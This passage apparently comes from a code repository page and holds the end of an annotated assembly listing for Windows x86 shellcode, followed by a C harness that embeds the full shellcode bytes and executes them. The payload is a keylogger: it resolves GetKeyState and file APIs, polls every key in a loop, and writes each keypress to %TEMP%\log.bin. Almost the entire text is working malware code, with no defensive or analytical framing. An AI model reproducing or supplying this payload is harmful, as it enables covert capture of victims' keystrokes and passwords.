push dword 0x4b746547 ; 00000100 684765744B
push esp ; 00000105 54
push edx ; 00000106 52
call edi ; 00000107 FFD7
lea esp,[esp+0xc] ; 00000109 8D64240C
push eax ; 0000010D 50
;WriteFile
push dword 0x55010165 ; 0000010E 6865010155
dec byte [esp+0x1] ; 00000113 FE4C2401
push dword 0x6c694665 ; 00000117 686546696C
push dword 0x74697257 ; 0000011C 6857726974
push esp ; 00000121 54
push ebx ; 00000122 53
call edi ; 00000123 FFD7
lea esp,[esp+0xc] ; 00000125 8D64240C
push eax ; 00000129 50
;CreateFileA
push dword 0x141656c ; 0000012A 686C654101
dec byte [esp+0x3] ; 0000012F FE4C2403
push dword 0x69466574 ; 00000133 6874654669
push dword 0x61657243 ; 00000138 6843726561
push esp ; 0000013D 54
push ebx ; 0000013E 53
call edi ; 0000013F FFD7
lea esp,[esp+0xc] ; 00000141 8D64240C
push eax ; 00000145 50
;GetEnvironmentVariableA
push dword 0x141656c ; 00000146 686C654101
dec byte [esp+0x3] ; 0000014B FE4C2403
push dword 0x62616972 ; 0000014F 6872696162
push dword 0x6156746e ; 00000154 686E745661
push dword 0x656d6e6f ; 00000159 686F6E6D65
push dword 0x7269766e ; 0000015E 686E766972
push dword 0x45746547 ; 00000163 6847657445
push esp ; 00000168 54
push ebx ; 00000169 53
call edi ; 0000016A FFD7
lea esp,[esp+0x18] ; 0000016C 8D642418
push eax ; 00000170 50
;Sleep
push byte +0x70 ; 00000171 6A70
push dword 0x65656c53 ; 00000173 68536C6565
push esp ; 00000178 54
push ebx ; 00000179 53
call edi ; 0000017A FFD7
lea esp,[esp+0x8] ; 0000017C 8D642408
push eax ; 00000180 50
;lstrcatA
push edx ; 00000181 52
push dword 0x41746163 ; 00000182 6863617441
push dword 0x7274736c ; 00000187 686C737472
push esp ; 0000018C 54
push ebx ; 0000018D 53
call edi ; 0000018E FFD7
lea esp,[esp+0xc] ; 00000190 8D64240C
push eax ; 00000194 50
;GetEnvironmentVariableA("TEMP");
xor ecx,ecx ; 00000195 31C9
mov cl,0xe ; 00000197 B10E
loc_199h:
push ecx ; 00000199 51
loop loc_199h ; 0000019A E2FD
push ecx ; 0000019C 51
push dword 0x504d4554 ; 0000019D 6854454D50
mov ecx,esp ; 000001A2 89E1
push byte +0x40 ; 000001A4 6A40
push ecx ; 000001A6 51
push ecx ; 000001A7 51
call dword [esp+0x54] ; 000001A8 FF542454
mov edx,esp ; 000001AC 89E2
;"\log.bin"
push byte +0x1 ; 000001AE 6A01
dec byte [esp] ; 000001B0 FE0C24
push dword 0x6e69622e ; 000001B3 682E62696E
push dword 0x676f6c5c ; 000001B8 685C6C6F67
mov ecx,esp ; 000001BD 89E1
push ecx ; 000001BF 51
push edx ; 000001C0 52
call dword [esp+0x54] ; 000001C1 FF542454
;CreateFileA("%TEMP%\log.bin")
xor ecx,ecx ; 000001C5 31C9
push ecx ; 000001C7 51
push ecx ; 000001C8 51
add byte [esp],0x80 ; 000001C9 80042480
push byte +0x4 ; 000001CD 6A04
push ecx ; 000001CF 51
push byte +0x2 ; 000001D0 6A02
push ecx ; 000001D2 51
add byte [esp],0x4 ; 000001D3 80042404
push eax ; 000001D7 50
call dword [esp+0x74] ; 000001D8 FF542474
lea esp,[esp+0x4c] ; 000001DC 8D64244C
push eax ; 000001E0 50
xor ecx,ecx ; 000001E1 31C9
mov esi,ecx ; 000001E3 89CE
mov cl,0x8 ; 000001E5 B108
loc_1e7h:
push esi ; 000001E7 56
loop loc_1e7h ; 000001E8 E2FD
;main loop
loc_1eah:
xor ecx,ecx ; 000001EA 31C9
xor esi,esi ; 000001EC 31F6
push byte +0x8 ; 000001EE 6A08
call dword [esp+0x2c] ; 000001F0 FF54242C
loc_1f4h:
mov eax,esi ; 000001F4 89F0
cmp al,0xff ; 000001F6 3CFF
jnc loc_1eah ; 000001F8 73F0
inc esi ; 000001FA 46
push esi ; 000001FB 56
call dword [esp+0x3c] ; 000001FC FF54243C
mov edx,esi ; 00000200 89F2
xor ecx,ecx ; 00000202 31C9
mov cl,0x80 ; 00000204 B180
and eax,ecx ; 00000206 21C8
xor ecx,ecx ; 00000208 31C9
cmp eax,ecx ; 0000020A 39C8
jnz loc_21eh ; 0000020C 7510
;GetKeyState false
;set bool array index zero
xor edx,edx ; 0000020E 31D2
mov ecx,edx ; 00000210 89D1
mov eax,esi ; 00000212 89F0
mov cl,0x20 ; 00000214 B120
div ecx ; 00000216 F7F1
btr [esp+eax*4],edx ; 00000218 0FB31484
jmp short loc_1f4h ; 0000021C EBD6
;GetKeyState true
;check bool array
;if bool true, skip
;if bool false, set bool true, write to file
loc_21eh:
xor edx,edx ; 0000021E 31D2
mov ecx,edx ; 00000220 89D1
mov eax,esi ; 00000222 89F0
mov cl,0x20 ; 00000224 B120
div ecx ; 00000226 F7F1
bt [esp+eax*4],edx ; 00000228 0FA31484
jc loc_1f4h ; 0000022C 72C6
xor edx,edx ; 0000022E 31D2
mov ecx,edx ; 00000230 89D1
mov eax,esi ; 00000232 89F0
mov cl,0x20 ; 00000234 B120
div ecx ; 00000236 F7F1
bts [esp+eax*4],edx ; 00000238 0FAB1484
xor ecx,ecx ; 0000023C 31C9
push esi ; 0000023E 56
push ecx ; 0000023F 51
lea ecx,[esp] ; 00000240 8D0C24
push ecx ; 00000243 51
push byte +0x1 ; 00000244 6A01
lea ecx,[esp+0xc] ; 00000246 8D4C240C
push ecx ; 0000024A 51
push dword [esp+0x34] ; 0000024B FF742434
call dword [esp+0x4c] ; 0000024F FF54244C
lea esp,[esp+0x4] ; 00000253 8D642404
jmp short loc_1eah ; 00000257 EB91
*/
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
"\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
"\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
"\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
"\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
"\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
"\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
"\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
"\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
"\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
"\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
"\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
"\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
"\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
"\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
"\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
"\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
"\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
"\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe\x4c\x24\x03\x68"
"\x72\x69\x61\x62\x68\x6e\x74\x56\x61\x68\x6f\x6e\x6d\x65\x68\x6e"
"\x76\x69\x72\x68\x47\x65\x74\x45\x54\x53\xff\xd7\x8d\x64\x24\x18"
"\x50\x6a\x70\x68\x53\x6c\x65\x65\x54\x53\xff\xd7\x8d\x64\x24\x08"
"\x50\x52\x68\x63\x61\x74\x41\x68\x6c\x73\x74\x72\x54\x53\xff\xd7"
"\x8d\x64\x24\x0c\x50\x31\xc9\xb1\x0e\x51\xe2\xfd\x51\x68\x54\x45"
"\x4d\x50\x89\xe1\x6a\x40\x51\x51\xff\x54\x24\x54\x89\xe2\x6a\x01"
"\xfe\x0c\x24\x68\x2e\x62\x69\x6e\x68\x5c\x6c\x6f\x67\x89\xe1\x51"
"\x52\xff\x54\x24\x54\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51"
"\x6a\x02\x51\x80\x04\x24\x04\x50\xff\x54\x24\x74\x8d\x64\x24\x4c"
"\x50\x31\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08"
"\xff\x54\x24\x2c\x89\xf0\x3c\xff\x73\xf0\x46\x56\xff\x54\x24\x3c"
"\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31\xd2"
"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31\xd2"
"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31\xd2"
"\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x31\xc9\x56\x51"
"\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c\x51\xff\x74\x24\x34\xff"
"\x54\x24\x4c\x8d\x64\x24\x04\xeb\x91";
int main(int argc, char *argv[]){
printf("Shellcode length: %d\n", (int)strlen(sc));
(*(void(*)(void))&sc)();
return 0;
}
Reference in a new issue View git blame Copy permalink